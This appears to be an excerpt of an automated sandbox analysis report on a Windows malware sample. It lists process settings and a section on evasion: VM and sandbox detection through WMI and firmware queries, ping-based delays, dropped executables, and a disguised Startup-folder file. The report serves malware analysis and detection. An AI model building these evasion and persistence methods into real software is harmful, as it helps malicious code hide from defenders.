                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Found API chain indicative of sandbox detection
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_29-104983
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Query firmware table information (likely to detect VMs)
                        Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Carbon.pif, 0000001D.00000003.2893690929.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Carbon.pif, 0000001D.00000003.2894225231.00000000039A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                        Uses ping.exe to sleep
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4500Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6205Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1751Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3633Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4495Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow / User API: threadDelayed 1205
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exeWindow / User API: threadDelayed 1469
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 2816
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 7181
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 3237
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exeWindow / User API: threadDelayed 6761
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3FB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF557.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF479.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI743.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DnsJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3DB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI773.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF38B.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI5924.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF3AB.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF577.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI713.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\Carbon.pifAPI coverage: 4.6 %
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 5007 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 4500 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 6205 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 1751 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe TID: 7788Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe TID: 6024Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424Thread sleep count: 2816 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424Thread sleep time: -281600000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424Thread sleep count: 7181 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 6424Thread sleep time: -718100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904Thread sleep count: 3237 > 30
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904Thread sleep time: -323700000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe TID: 1904Thread sleep count: 6761 > 30
